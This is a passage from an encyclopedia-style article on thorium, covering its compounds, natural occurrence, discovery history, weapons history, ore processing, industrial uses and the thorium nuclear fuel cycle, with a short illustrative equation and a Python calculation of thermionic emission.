ThO2, which has the fluorite structure. Thorium dioxide is a refractory material, with the highest melting point (3390 °C) of any known oxide. It is somewhat hygroscopic and reacts readily with water and many gases; it dissolves easily in concentrated nitric acid in the presence of fluoride. When heated in air, thorium dioxide emits intense blue light; the light becomes white when the ThO2 is mixed with its lighter homologue cerium dioxide (CeO2, ceria): this is the basis for its previously common application in gas mantles. A flame is not necessary for this effect: in 1901, it was discovered that a hot Welsbach gas mantle (using ThO2 with 1% CeO2) remained at "full glow" when exposed to a cold unignited mixture of flammable gas and air. The light emitted by thorium dioxide is higher in wavelength than the blackbody emission expected from incandescence at the same temperature, an effect called candoluminescence. It occurs because ThO2:Ce acts as a catalyst for the recombination of free radicals that appear in high concentration in a flame, whose deexcitation releases large amounts of energy. The addition of 1% cerium dioxide, as in gas mantles, heightens the effect by increasing emissivity in the visible region of the spectrum; but because cerium, unlike thorium, can occur in multiple oxidation states, its charge and hence visible emissivity will depend on the region of the flame it is found in (as such regions vary in their chemical composition and hence how oxidising or reducing they are). Several binary thorium chalcogenides and oxychalcogenides are also known with sulfur, selenium, and tellurium. All four thorium tetrahalides are known, as are some low-valent bromides and iodides: the tetrahalides are all 8-coordinated hygroscopic compounds that dissolve easily in polar solvents such as water. Many related polyhalide ions are also known. Thorium tetrafluoride has a monoclinic crystal structure like those of zirconium tetrafluoride and hafnium tetrafluoride, where the Th⁴⁺ ions are coordinated with F⁻ ions in somewhat distorted square antiprisms. 
The other tetrahalides instead have dodecahedral geometry. Lower iodides ThI3 (black) and ThI2 (gold-coloured) can also be prepared by reducing the tetraiodide with thorium metal: they do not contain Th(III) and Th(II), but instead contain Th⁴⁺ and could be more clearly formulated as electride compounds. Many polynary halides with the alkali metals, barium, thallium, and ammonium are known for thorium fluorides, chlorides, and bromides. For example, when treated with potassium fluoride and hydrofluoric acid, Th⁴⁺ forms the complex anion ThF6²⁻ (hexafluorothorate(IV)), which precipitates as an insoluble salt, K2ThF6 (potassium hexafluorothorate(IV)). Thorium borides, carbides, silicides, and nitrides are refractory materials, like those of uranium and plutonium, and have thus received attention as possible nuclear fuels. All four heavier pnictogens (phosphorus, arsenic, antimony, and bismuth) also form binary thorium compounds. Thorium germanides are also known. Thorium reacts with hydrogen to form the thorium hydrides ThH2 and Th4H15, the latter of which is superconducting below 7.5–8 K; at standard temperature and pressure, it conducts electricity like a metal. The hydrides are thermally unstable and readily decompose upon exposure to air or moisture. Coordination compounds In an acidic aqueous solution, thorium occurs as the tetrapositive aqua ion [Th(H2O)9]⁴⁺, which has tricapped trigonal prismatic molecular geometry: at pH < 3, the solutions of thorium salts are dominated by this cation. The Th⁴⁺ ion is the largest of the tetrapositive actinide ions, and depending on the coordination number can have a radius between 0.95 and 1.14 Å. It is quite acidic due to its high charge, slightly stronger than sulfurous acid: thus it tends to undergo hydrolysis and polymerisation, predominantly to [Th2(OH)2]⁶⁺ in solutions with pH 3 or below, but in more alkaline solution polymerisation continues until the gelatinous hydroxide Th(OH)4 forms and precipitates out (though equilibrium may take weeks to be reached, because the polymerisation usually slows down before the precipitation). As a hard Lewis acid, Th⁴⁺ favours hard ligands with oxygen atoms as donors: complexes with sulfur atoms as donors are less stable and more prone to hydrolysis. High coordination numbers are the rule for thorium due to its large size. Thorium nitrate pentahydrate was the first known example of coordination number 11, the oxalate tetrahydrate has coordination number 10, and the borohydride Th(BH4)4 (first prepared in the Manhattan Project) has coordination number 14. These thorium salts are known for their high solubility in water and polar organic solvents. Many other inorganic thorium compounds with polyatomic anions are known, such as the perchlorates, sulfates, sulfites, nitrates, carbonates, phosphates, vanadates, molybdates, and chromates, and their hydrated forms. They are important in thorium purification and the disposal of nuclear waste, but most of them have not yet been fully characterised, especially regarding their structural properties. For example, thorium nitrate is produced by reacting thorium hydroxide with nitric acid: it is soluble in water and alcohols and is an important intermediate in the purification of thorium and its compounds. Thorium complexes with organic ligands, such as oxalate, citrate, and EDTA, are much more stable. 
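The nitrate synthesis just mentioned is a simple acid–base neutralization; a minimal balanced form, written out here for illustration with standard stoichiometry rather than quoted from a source:

```latex
% Neutralization of thorium hydroxide by nitric acid (illustrative stoichiometry):
\mathrm{Th(OH)_4 + 4\,HNO_3 \longrightarrow Th(NO_3)_4 + 4\,H_2O}
```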
In natural thorium-containing waters, organic thorium complexes usually occur in concentrations orders of magnitude higher than the inorganic complexes, even when the concentrations of inorganic ligands are much greater than those of organic ligands. In January 2021, aromaticity was observed in a large metal cluster anion consisting of 12 bismuth atoms stabilised by a central thorium cation. This compound was shown to be surprisingly stable, unlike many previously known aromatic metal clusters. Organothorium compounds Most of the work on organothorium compounds has focused on the cyclopentadienyl complexes and cyclooctatetraenyls. Like many of the early and middle actinides (up to americium, and also expected for curium), thorium forms a cyclooctatetraenide complex: the yellow Th(C8H8)2, thorocene. It is isotypic with the better-known analogous uranium compound uranocene. It can be prepared by reacting K2C8H8 with thorium tetrachloride in tetrahydrofuran (THF) at the temperature of dry ice, or by a similar reaction starting from thorium tetrafluoride. It is unstable in air and decomposes in water or at 190 °C. Half-sandwich compounds are also known, such as (η8-C8H8)ThCl2(THF)2, which has a piano-stool structure and is made by reacting thorocene with thorium tetrachloride in tetrahydrofuran. The simplest of the cyclopentadienyls are Th(C5H5)3 and Th(C5H5)4: many derivatives are known. The former (which has two forms, one purple and one green) is a rare example of thorium in the formal +3 oxidation state; a formal +2 oxidation state occurs in a derivative. The chloride derivative Th(C5H5)3Cl is prepared by heating thorium tetrachloride with limiting KC5H5 (other univalent metal cyclopentadienyls can also be used). The alkyl and aryl derivatives are prepared from the chloride derivative and have been used to study the nature of the Th–C sigma bond. Other organothorium compounds are not well-studied. Tetrabenzylthorium, Th(CH2C6H5)4, and tetraallylthorium, Th(C3H5)4, are known, but their structures have not been determined. They decompose slowly at room temperature. Thorium forms the monocapped trigonal prismatic anion [Th(CH3)7]³⁻, heptamethylthorate(IV), which forms the salt [Li(tmeda)]3[Th(CH3)7] (tmeda = N,N,N′,N′-tetramethylethylenediamine). Although one methyl group is attached only to the thorium atom (Th–C distance 257.1 pm) and the other six connect the lithium and thorium atoms (Th–C distances 265.5–276.5 pm), they behave equivalently in solution. Tetramethylthorium, Th(CH3)4, is not known, but its adducts are stabilised by phosphine ligands. Occurrence Formation 232Th is a primordial nuclide, having existed in its current form for over ten billion years; it was formed during the r-process, which probably occurs in supernovae and neutron star mergers. These violent events scattered it across the galaxy. The letter "r" stands for "rapid neutron capture"; the process occurs in core-collapse supernovae, where heavy seed nuclei such as 56Fe rapidly capture neutrons, running up against the neutron drip line, as neutrons are captured much faster than the resulting nuclides can beta decay back toward stability. Neutron capture is the only way for stars to synthesise elements beyond iron, because of the increased Coulomb barriers that make interactions between charged particles difficult at high atomic numbers and the fact that fusion beyond 56Fe is endothermic. Because of the abrupt loss of stability past 209Bi, the r-process is the only process of stellar nucleosynthesis that can create thorium and uranium; all other processes are too slow and the intermediate nuclei alpha decay before they capture enough neutrons to reach these elements. 
Abundance In the universe, thorium is among the rarest of the primordial elements, ranking 77th in cosmic abundance, because it is one of the two elements that can be produced only in the r-process (the other being uranium), and also because it has slowly been decaying away from the moment it formed. The only primordial elements rarer than thorium are thulium, lutetium, tantalum, and rhenium, the odd-numbered elements just before the third peak of r-process abundances around the heavy platinum group metals, as well as uranium. In the distant past the abundances of thorium and uranium were enriched by the decay of plutonium and curium isotopes, and thorium was enriched relative to uranium by the decay of 236U to 232Th and the natural depletion of 235U, but these sources have long since decayed and no longer contribute. In the Earth's crust, thorium is much more abundant: with an abundance of 8.1 g/tonne, it is one of the most abundant of the heavy elements, almost as abundant as lead (13 g/tonne) and more abundant than tin (2.1 g/tonne). This is because thorium is likely to form oxide minerals that do not sink into the core; it is classified as a lithophile under the Goldschmidt classification, meaning that it is generally found combined with oxygen. Common thorium compounds are also poorly soluble in water. Thus, even though the refractory elements have the same relative abundances in the Earth as in the Solar System as a whole, there is more accessible thorium than heavy platinum group metals in the crust. On Earth Natural thorium is usually almost pure 232Th, which is the longest-lived and most stable isotope of thorium, having a half-life comparable to the age of the universe. Its radioactive decay is the largest single contributor to the Earth's internal heat; the other major contributors are the shorter-lived primordial radionuclides, which are 238U, 40K, and 235U in descending order of their contribution. (At the time of the Earth's formation, 40K and 235U contributed much more by virtue of their short half-lives, but they have decayed more quickly, leaving the contribution from 232Th and 238U predominant.) Its decay accounts for a gradual decrease of the thorium content of the Earth: the planet currently has around 85% of the amount present at the formation of the Earth. The other natural thorium isotopes are much shorter-lived; of them, only 230Th is usually detectable, occurring in secular equilibrium with its parent 238U, and making up at most 0.04% of natural thorium. Thorium only occurs as a minor constituent of most minerals, and was for this reason previously thought to be rare. In fact, it is the 37th most abundant element in the Earth's crust with an abundance of 12 parts per million. In nature, thorium occurs in the +4 oxidation state, together with uranium(IV), zirconium(IV), hafnium(IV), and cerium(IV), and also with scandium, yttrium, and the trivalent lanthanides which have similar ionic radii. Because of thorium's radioactivity, minerals containing it are often metamict (amorphous), their crystal structure having been damaged by the alpha radiation produced by thorium. An extreme example is ekanite, Ca2ThSi8O20, which almost never occurs in nonmetamict form due to the thorium it contains. Monazite (chiefly phosphates of various rare-earth elements) is the most important commercial source of thorium because it occurs in large deposits worldwide, principally in India, South Africa, Brazil, Australia, and Malaysia. 
It contains around 2.5% thorium on average, although some deposits may contain up to 20%. Monazite is a chemically unreactive mineral that is found as yellow or brown sand; its low reactivity makes it difficult to extract thorium from it. Allanite (chiefly silicates-hydroxides of various metals) can have 0.1–2% thorium, and zircon (chiefly zirconium silicate, ZrSiO4) up to 0.4% thorium. Thorium dioxide occurs as the rare mineral thorianite. Because it is isotypic with uranium dioxide, these two common actinide dioxides can form solid-state solutions, and the name of the mineral changes according to the ThO2 content. Thorite (chiefly thorium silicate, ThSiO4) also has a high thorium content and is the mineral in which thorium was first discovered. In thorium silicate minerals, the Th⁴⁺ and SiO4⁴⁻ ions are often replaced with M³⁺ (where M = Sc, Y, or Ln) and phosphate (PO4³⁻) ions respectively. Because of the great insolubility of thorium dioxide, thorium does not usually spread quickly through the environment when released. The Th⁴⁺ ion is soluble, especially in acidic soils, and in such conditions the thorium concentration can be higher. History Erroneous report In 1815, the Swedish chemist Jöns Jacob Berzelius analysed an unusual sample of gadolinite from a copper mine in Falun, central Sweden. He noted impregnated traces of a white mineral, which he cautiously assumed to be an earth (oxide in modern chemical nomenclature) of an unknown element. Berzelius had already discovered two elements, cerium and selenium, but he had made a public mistake once, announcing a new element, gahnium, that turned out to be zinc oxide. Berzelius privately named the putative element "thorium" in 1817 and its supposed oxide "thorina" after Thor, the Norse god of thunder. In 1824, after more deposits of the same mineral in Vest-Agder, Norway, were discovered, he retracted his findings, as the mineral (later named xenotime) proved to be mostly yttrium orthophosphate. Discovery In 1828, Morten Thrane Esmark found a black mineral on Løvøya island, Telemark county, Norway. He was a Norwegian priest and amateur mineralogist who studied the minerals in Telemark, where he served as vicar. He commonly sent the most interesting specimens, such as this one, to his father, Jens Esmark, a noted mineralogist and professor of mineralogy and geology at the Royal Frederick University in Christiania (today called Oslo). The elder Esmark determined that it was not a known mineral and sent a sample to Berzelius for examination. Berzelius determined that it contained a new element. He published his findings in 1829, having isolated an impure sample by reducing KThF5 (potassium pentafluorothorate(IV)) with potassium metal. Berzelius reused the name of the previous supposed element discovery and named the source mineral thorite. Berzelius made some initial characterisations of the new metal and its chemical compounds: he correctly determined that the thorium–oxygen mass ratio of thorium oxide was 7.5 (its actual value is close to that, ~7.3), but he assumed the new element was divalent rather than tetravalent, and so calculated that the atomic mass was 7.5 times that of oxygen (120 amu); it is actually 15 times as large. He determined that thorium was a very electropositive metal, ahead of cerium and behind zirconium in electropositivity. Metallic thorium was isolated for the first time in 1914 by Dutch entrepreneurs Dirk Lely Jr. and Lodewijk Hamburger. 
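Berzelius's atomic-mass error is easy to reconstruct from the figures above; the worked arithmetic below takes the atomic mass of oxygen as 16 u, a modern value assumed for the illustration:

```latex
% Assuming a divalent ThO formula (one oxygen per thorium):
%   m(Th)/m(O) = 7.5  =>  A(Th) = 7.5 x 16 = 120 u.
% With the correct tetravalent ThO2 formula (two oxygens per thorium):
%   the measured ratio ~7.3 refers to two oxygens,
%   so A(Th) ~ 7.3 x 32 ~ 234 u, close to the true ~232 u
%   (roughly 15 times the mass of oxygen, as the text notes).
\frac{A(\mathrm{Th})}{A(\mathrm{O})} = 7.5 \;\Rightarrow\; A(\mathrm{Th}) = 120\,\mathrm{u}
\qquad\text{vs.}\qquad
\frac{A(\mathrm{Th})}{2\,A(\mathrm{O})} \approx 7.3 \;\Rightarrow\; A(\mathrm{Th}) \approx 234\,\mathrm{u}
```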
Initial chemical classification In the periodic table published by Dmitri Mendeleev in 1869, thorium and the rare-earth elements were placed outside the main body of the table, at the end of each vertical period after the alkaline earth metals. This reflected the belief at that time that thorium and the rare-earth metals were divalent. With the later recognition that the rare earths were mostly trivalent and thorium was tetravalent, Mendeleev moved cerium and thorium to group IV in 1871, which also contained the modern carbon group (group 14) and titanium group (group 4), because their maximum oxidation state was +4. Cerium was soon removed from the main body of the table and placed in a separate lanthanide series; thorium was left with group 4 as it had similar properties to its supposed lighter congeners in that group, such as titanium and zirconium. First uses While thorium was discovered in 1828 its first application dates only from 1885, when Austrian chemist Carl Auer von Welsbach invented the gas mantle, a portable source of light which produces light from the incandescence of thorium oxide when heated by burning gaseous fuels. Many applications were subsequently found for thorium and its compounds, including ceramics, carbon arc lamps, heat-resistant crucibles, and as catalysts for industrial chemical reactions such as the oxidation of ammonia to nitric acid. Radioactivity Thorium was first observed to be radioactive in 1898, by the German chemist Gerhard Carl Schmidt and later that year, independently, by the Polish-French physicist Marie Curie. It was the second element that was found to be radioactive, after the 1896 discovery of radioactivity in uranium by French physicist Henri Becquerel. Starting from 1899, the New Zealand physicist Ernest Rutherford and the American electrical engineer Robert Bowie Owens studied the radiation from thorium; initial observations showed that it varied significantly. It was determined that these variations came from a short-lived gaseous daughter of thorium, which they found to be a new element. This element is now named radon, the only one of the rare radioelements to be discovered in nature as a daughter of thorium rather than uranium. After accounting for the contribution of radon, Rutherford, now working with the British physicist Frederick Soddy, showed how thorium decayed at a fixed rate over time into a series of other elements in work dating from 1900 to 1903. This observation led to the identification of the half-life as one of the outcomes of the alpha particle experiments that led to the disintegration theory of radioactivity. The biological effect of radiation was discovered in 1903. The newly discovered phenomenon of radioactivity excited scientists and the general public alike. In the 1920s, thorium's radioactivity was promoted as a cure for rheumatism, diabetes, and sexual impotence. In 1932, most of these uses were banned in the United States after a federal investigation into the health effects of radioactivity. 10,000 individuals in the United States had been injected with thorium during X-ray diagnosis; they were later found to suffer health issues such as leukaemia and abnormal chromosomes. Public interest in radioactivity had declined by the end of the 1930s. Further classification Up to the late 19th century, chemists unanimously agreed that thorium and uranium were the heaviest members of group 4 and group 6 respectively; the existence of the lanthanides in the sixth row was considered to be a one-off fluke. 
In 1892, British chemist Henry Bassett postulated a second extra-long periodic table row to accommodate known and undiscovered elements, considering thorium and uranium to be analogous to the lanthanides. In 1913, Danish physicist Niels Bohr published a theoretical model of the atom and its electron orbitals, which soon gathered wide acceptance. The model indicated that the seventh row of the periodic table should also have f-shells filling before the d-shells that were filled in the transition elements, like the sixth row with the lanthanides preceding the 5d transition metals. The existence of a second inner transition series, in the form of the actinides, was not accepted until similarities with the electron structures of the lanthanides had been established; Bohr suggested that the filling of the 5f orbitals may be delayed to after uranium. It was only with the discovery of the first transuranic elements, which from plutonium onward have dominant +3 and +4 oxidation states like the lanthanides, that it was realised that the actinides were indeed filling f-orbitals rather than d-orbitals, with the transition-metal-like chemistry of the early actinides being the exception and not the rule. In 1945, when American physicist Glenn T. Seaborg and his team had discovered the transuranic elements americium and curium, he proposed the actinide concept, realising that thorium was the second member of an f-block actinide series analogous to the lanthanides, instead of being the heavier congener of hafnium in a fourth d-block row. Phasing out In the 1990s, most applications that do not depend on thorium's radioactivity declined quickly due to safety and environmental concerns as suitable safer replacements were found. Despite its radioactivity, the element has remained in use for applications where no suitable alternatives could be found. A 1981 study by the Oak Ridge National Laboratory in the United States estimated that using a thorium gas mantle every weekend would be safe for a person, but this was not the case for the dose received by people manufacturing the mantles or for the soils around some factory sites. Some manufacturers have changed to other materials, such as yttrium. As recently as 2007, some companies continued to manufacture and sell thorium mantles without giving adequate information about their radioactivity, with some even falsely claiming them to be non-radioactive. Nuclear power Thorium has been used as a power source on a prototype scale. The earliest thorium-based reactor was built at the Indian Point Energy Center located in Buchanan, New York, United States in 1962. China may be the first to have a shot at commercialising the technology. The country with the largest estimated reserves of thorium in the world is India, which has sparse reserves of uranium. In the 1950s, India targeted achieving energy independence with their three-stage nuclear power programme. In most countries, uranium was relatively abundant and the progress of thorium-based reactors was slow; in the 20th century, three reactors were built in India and twelve elsewhere. Large-scale research was begun in 1996 by the International Atomic Energy Agency to study the use of thorium reactors; a year later, the United States Department of Energy started their research. Alvin Radkowsky of Tel Aviv University in Israel was the head designer of Shippingport Atomic Power Station in Pennsylvania, the first American civilian reactor to breed thorium. 
He founded a consortium to develop thorium reactors, which included other laboratories: Raytheon Nuclear Inc. and Brookhaven National Laboratory in the United States, and the Kurchatov Institute in Russia. In the 21st century, thorium's potential for reducing nuclear proliferation and its waste characteristics led to renewed interest in the thorium fuel cycle. India has projected meeting as much as 30% of its electrical demands through thorium-based nuclear power by 2050. In February 2014, Bhabha Atomic Research Centre (BARC), in Mumbai, India, presented their latest design for a "next-generation nuclear reactor" that burns thorium as its fuel core, calling it the Advanced Heavy Water Reactor (AHWR). In 2009, the chairman of the Indian Atomic Energy Commission said that India has a "long-term objective goal of becoming energy-independent based on its vast thorium resources." On 16 June 2023 China's National Nuclear Safety Administration issued a licence to the Shanghai Institute of Applied Physics (SINAP) of the Chinese Academy of Sciences to begin operating the TMSR-LF1, 2 MWt liquid fuel thorium-based molten salt experimental reactor which was completed in August 2021. China is believed to have one of the largest thorium reserves in the world. The exact size of those reserves has not been publicly disclosed, but it is estimated to be enough to meet the country's total energy needs for more than 20,000 years. Nuclear weapons When gram quantities of plutonium were first produced in the Manhattan Project, it was discovered that a minor isotope (240Pu) underwent significant spontaneous fission, which brought into question the viability of a plutonium-fuelled gun-type nuclear weapon. While the Los Alamos team began work on the implosion-type weapon to circumvent this issue, the Chicago team discussed reactor design solutions. Eugene Wigner proposed to use the 240Pu-contaminated plutonium to drive the conversion of thorium into 233U in a special converter reactor. It was hypothesized that the 233U would then be usable in a gun-type weapon, though concerns about contamination from 232U were voiced. Progress on the implosion weapon was sufficient, and this converter was not developed further, but the design had enormous influence on the development of nuclear energy. It was the first detailed description of a highly enriched water-cooled, water-moderated reactor similar to future naval and commercial power reactors. During the Cold War the United States explored the possibility of using 232Th as a source of 233U to be used in a nuclear bomb; they fired a test bomb in 1955. They concluded that a 233U-fired bomb would be a very potent weapon, but it bore few sustainable "technical advantages" over the contemporary uranium–plutonium bombs, especially since 233U is difficult to produce in isotopically pure form. Thorium metal was used in the radiation case of at least one nuclear weapon design deployed by the United States (the W71). Production The low demand makes working mines for extraction of thorium alone not profitable, and it is almost always extracted with the rare earths, which themselves may be by-products of production of other minerals. The current reliance on monazite for production is due to thorium being largely produced as a by-product; other sources such as thorite contain more thorium and could easily be used for production if demand rose. Present knowledge of the distribution of thorium resources is poor, as low demand has led to exploration efforts being relatively minor. 
In 2014, world production of the monazite concentrate, from which thorium would be extracted, was 2,700 tonnes. The common production route for thorium consists of concentration of thorium minerals; extraction of thorium from the concentrate; purification of thorium; and (optionally) conversion to compounds, such as thorium dioxide. Concentration There are two categories of thorium minerals for thorium extraction: primary and secondary. Primary deposits occur in acidic granitic magmas and pegmatites. They are concentrated, but of small size. Secondary deposits occur at the mouths of rivers in granitic mountain regions. In these deposits, thorium is enriched along with other heavy minerals. Initial concentration varies with the type of deposit. For the primary deposits, the source pegmatites, which are usually obtained by mining, are divided into small parts and then undergo flotation. Alkaline earth metal carbonates may be removed after reaction with hydrogen chloride; then follow thickening, filtration, and calcination. The result is a concentrate with a rare-earth content of up to 90%. Secondary materials (such as coastal sands) undergo gravity separation. Magnetic separation follows, with a series of magnets of increasing strength. Monazite obtained by this method can be as pure as 98%. Industrial production in the 20th century relied on treatment with hot, concentrated sulfuric acid in cast iron vessels, followed by selective precipitation by dilution with water, as in the subsequent steps. This method relied on the specifics of the technique and the concentrate grain size; many alternatives have been proposed, but only one has proven economically effective: alkaline digestion with hot sodium hydroxide solution. This is more expensive than the original method but yields a higher purity of thorium; in particular, it removes phosphates from the concentrate. Acid digestion Acid digestion is a two-stage process, involving the use of up to 93% sulfuric acid at 210–230 °C. First, sulfuric acid in excess of 60% of the sand mass is added, thickening the reaction mixture as products are formed. Then, fuming sulfuric acid is added and the mixture is kept at the same temperature for another five hours to reduce the volume of solution remaining after dilution. The concentration of the sulfuric acid is selected based on reaction rate and viscosity, both of which increase with concentration, although the higher viscosity retards the reaction. Increasing the temperature also speeds up the reaction, but temperatures of 300 °C and above must be avoided, because they cause insoluble thorium pyrophosphate to form. Since dissolution is very exothermic, the monazite sand cannot be added to the acid too quickly. Conversely, at temperatures below 200 °C the reaction does not go fast enough for the process to be practical. To ensure that no precipitates form to block the reactive monazite surface, the mass of acid used must be twice that of the sand, instead of the 60% that would be expected from stoichiometry. The mixture is then cooled to 70 °C and diluted with ten times its volume of cold water, so that any remaining monazite sinks to the bottom while the rare earths and thorium remain in solution. Thorium may then be separated by precipitating it as the phosphate at pH 1.3, since the rare earths do not precipitate until pH 2. Alkaline digestion Alkaline digestion is carried out in 30–45% sodium hydroxide solution at about 140 °C for about three hours. 
Too high a temperature leads to the formation of poorly soluble thorium oxide and an excess of uranium in the filtrate, and too low a concentration of alkali leads to a very slow reaction. These reaction conditions are rather mild and require monazite sand with a particle size under 45 μm. Following filtration, the filter cake includes thorium and the rare earths as their hydroxides, uranium as sodium diuranate, and phosphate as trisodium phosphate. This crystallises as trisodium phosphate decahydrate when cooled below 60 °C; uranium impurities in this product increase with the amount of silicon dioxide in the reaction mixture, necessitating recrystallisation before commercial use. The hydroxides are dissolved at 80 °C in 37% hydrochloric acid. Filtration of the remaining precipitates followed by addition of 47% sodium hydroxide results in the precipitation of thorium and uranium at about pH 5.8. Complete drying of the precipitate must be avoided, as air may oxidise cerium from the +3 to the +4 oxidation state, and the cerium(IV) formed can liberate free chlorine from the hydrochloric acid. The rare earths again precipitate out at higher pH. The precipitates are neutralised by the original sodium hydroxide solution, although most of the phosphate must first be removed to avoid precipitating rare-earth phosphates. Solvent extraction may also be used to separate out the thorium and uranium, by dissolving the resultant filter cake in nitric acid. The presence of titanium hydroxide is deleterious, as it binds thorium and prevents it from dissolving fully. Purification High thorium concentrations are needed in nuclear applications. In particular, concentrations of atoms with high neutron capture cross-sections must be very low (for example, gadolinium concentrations must be lower than one part per million by weight). Previously, repeated dissolution and recrystallisation was used to achieve high purity. Today, liquid solvent extraction procedures involving selective complexation of Th4+ are used. For example, following alkaline digestion and the removal of phosphate, the resulting nitrato complexes of thorium, uranium, and the rare earths can be separated by extraction with tributyl phosphate in kerosene. Modern applications Non-radioactivity-related uses of thorium have been in decline since the 1950s due to environmental concerns largely stemming from the radioactivity of thorium and its decay products. Most thorium applications use its dioxide (sometimes called "thoria" in the industry), rather than the metal. This compound has a melting point of 3300 °C (6000 °F), the highest of all known oxides; only a few substances have higher melting points. This helps the compound remain solid in a flame, and it considerably increases the brightness of the flame; this is the main reason thorium is used in gas lamp mantles. All substances emit energy (glow) at high temperatures, but the light emitted by thorium is nearly all in the visible spectrum, hence the brightness of thorium mantles. Energy, some of it in the form of visible light, is emitted when thorium is exposed to a source of energy itself, such as a cathode ray, heat, or ultraviolet light. This effect is shared by cerium dioxide, which converts ultraviolet light into visible light more efficiently, but thorium dioxide gives a higher flame temperature, emitting less infrared light. Thorium in mantles, though still common, has been progressively replaced with yttrium since the late 1990s. 
According to the 2005 review by the United Kingdom's National Radiological Protection Board, "although [thoriated gas mantles] were widely available a few years ago, they are not any more." Thorium is also used to make cheap permanent negative ion generators, such as in pseudoscientific health bracelets. During the production of incandescent filaments, recrystallisation of tungsten is significantly lowered by adding small amounts of thorium dioxide to the tungsten sintering powder before drawing the filaments. A small addition of thorium to tungsten thermocathodes considerably reduces the work function of electrons; as a result, electrons are emitted at considerably lower temperatures. Thorium forms a one-atom-thick layer on the surface of tungsten. The work function of a thorium surface is lowered, possibly because of the electric field at the interface between thorium and tungsten that forms due to thorium's greater electropositivity. Since the 1920s, thoriated tungsten wires have been used in electronic tubes and in the cathodes and anticathodes of X-ray tubes and rectifiers. The reactivity of thorium with atmospheric oxygen required the introduction of an evaporated magnesium layer as a getter for impurities in the evacuated tubes, giving them their characteristic metallic inner coating. The introduction of transistors in the 1950s significantly diminished this use, but not entirely. Thorium dioxide is used in gas tungsten arc welding (GTAW) to increase the high-temperature strength of tungsten electrodes and improve arc stability. Thorium oxide is being replaced in this use by other oxides, such as those of zirconium, cerium, and lanthanum. Thorium dioxide is found in refractory ceramics, such as high-temperature laboratory crucibles, either as the primary ingredient or as an addition to zirconium dioxide. An alloy of 90% platinum and 10% thorium is an effective catalyst for oxidising ammonia to nitrogen oxides, but this has been replaced by an alloy of 95% platinum and 5% rhodium because of its better mechanical properties and greater durability. When added to glass, thorium dioxide helps increase its refractive index and decrease dispersion. Such glass finds application in high-quality lenses for cameras and scientific instruments. The radiation from these lenses can darken them and turn them yellow over a period of years, and it degrades film, but the health risks are minimal. Yellowed lenses may be restored to their original colourless state by lengthy exposure to intense ultraviolet radiation. Thorium dioxide has since been replaced in this application by rare-earth oxides, such as lanthanum oxide, as they provide similar effects and are not radioactive. Thorium tetrafluoride is used as an anti-reflection material in multilayered optical coatings. It is transparent to electromagnetic waves with wavelengths in the range of 0.350–12 μm, which includes near-ultraviolet, visible, and mid-infrared light. Its radiation is primarily due to alpha particles, which can be easily stopped by a thin cover layer of another material. Replacements for thorium tetrafluoride have been under development since the 2010s; these include lanthanum trifluoride. Mag-Thor alloys (also called thoriated magnesium) found use in some aerospace applications, though such uses have been phased out due to concerns over radioactivity. 
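Returning to the thoriated thermocathodes mentioned above: the practical consequence of the lowered work function can be illustrated with the Richardson–Dushman law for thermionic emission. In the Python sketch below, the work-function values (about 4.5 eV for clean tungsten and about 2.6 eV for a thoriated surface) and the operating temperature are typical textbook figures assumed for illustration; they are not taken from this article:

import math

A_R = 1.2017e6     # theoretical Richardson constant, A m^-2 K^-2
K_B = 8.617333e-5  # Boltzmann constant, eV/K

def emission_current_density(work_function_ev, temperature_k):
    """Richardson-Dushman law: J = A * T^2 * exp(-W / (k_B * T)), in A/m^2."""
    return A_R * temperature_k**2 * math.exp(-work_function_ev / (K_B * temperature_k))

T = 1900.0  # assumed cathode temperature, K
j_clean = emission_current_density(4.5, T)      # clean tungsten (assumed ~4.5 eV)
j_thoriated = emission_current_density(2.6, T)  # thoriated tungsten (assumed ~2.6 eV)

print(f"clean W:     {j_clean:.3e} A/m^2")
print(f"thoriated W: {j_thoriated:.3e} A/m^2")
print(f"ratio: {j_thoriated / j_clean:.1e}")  # roughly 1e5 at this temperature

Because the work function sits in an exponential, even this modest reduction raises the emission current by several orders of magnitude at a given temperature, which is why thoriated cathodes can run considerably cooler.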
Potential use for nuclear energy The main nuclear power source in a reactor is the neutron-induced fission of a nuclide; the synthetic fissile nuclei 233U and 239Pu can be bred by neutron capture from the naturally occurring fertile nuclides 232Th and 238U. 235U occurs naturally in significant amounts and is also fissile. In the thorium fuel cycle, the fertile isotope 232Th is bombarded by slow neutrons, undergoing neutron capture to become 233Th, which undergoes two consecutive beta decays to become first 233Pa and then the fissile 233U: 232Th + n → 233Th + γ; 233Th → 233Pa + β− (half-life 21.8 minutes); 233Pa → 233U + β− (half-life 27 days); 233U itself eventually undergoes alpha decay with a half-life of 1.60 × 10^5 years. 233U is fissile and can be used as a nuclear fuel in the same way as 235U or 239Pu. When 233U undergoes nuclear fission, the neutrons emitted can strike further 232Th nuclei, continuing the cycle. This parallels the uranium fuel cycle in fast breeder reactors, where 238U undergoes neutron capture to become 239U, beta decaying to first 239Np and then fissile 239Pu. The fission of 233U produces 2.48 neutrons on average. One neutron is needed to keep the fission reaction going. For a self-contained continuous breeding cycle, one more neutron is needed to breed a new 233U atom from the fertile 232Th. This leaves a margin of 0.45 neutrons (or 18% of the neutron flux) for losses. Advantages Thorium is more abundant than uranium, and can satisfy world energy demands for longer. It is particularly suitable for use as a fertile material in molten salt reactors. 232Th absorbs neutrons more readily than 238U, and 233U has a higher probability of fission upon neutron capture (92.0%) than 235U (85.5%) or 239Pu (73.5%). It also releases more neutrons upon fission on average. A single neutron capture by 238U produces transuranic waste along with the fissile 239Pu, but 232Th only produces this waste after five captures, forming 237Np. This number of captures does not happen for 98–99% of the 232Th nuclei because the intermediate products 233U or 235U undergo fission, and fewer long-lived transuranics are produced. Because of this, thorium is a potentially attractive alternative to uranium in mixed oxide fuels to minimise the generation of transuranics and maximise the destruction of plutonium. Thorium fuels result in a safer and better-performing reactor core because thorium dioxide has a higher melting point, higher thermal conductivity, and a lower coefficient of thermal expansion. It is more stable chemically than the now-common fuel uranium dioxide, because the latter oxidises to triuranium octoxide (U3O8), becoming substantially less dense. Disadvantages The used fuel is difficult and dangerous to reprocess because many of the daughters of 232Th and 233U are strong gamma emitters. All 233U production methods result in impurities of 232U, either from parasitic knock-out (n,2n) reactions on 232Th, 233Pa, or 233U that result in the loss of a neutron, or from double neutron capture of 230Th, an impurity in natural 232Th: 230Th + n → 231Th + γ, which beta-decays to 231Pa; 231Pa + n → 232Pa + γ, which beta-decays to 232U. 232U by itself is not particularly harmful, but quickly decays to produce the strong gamma emitter 208Tl. (232Th follows the same decay chain, but its much longer half-life means that the quantities of 208Tl produced are negligible.) These impurities of 232U make 233U easy to detect and 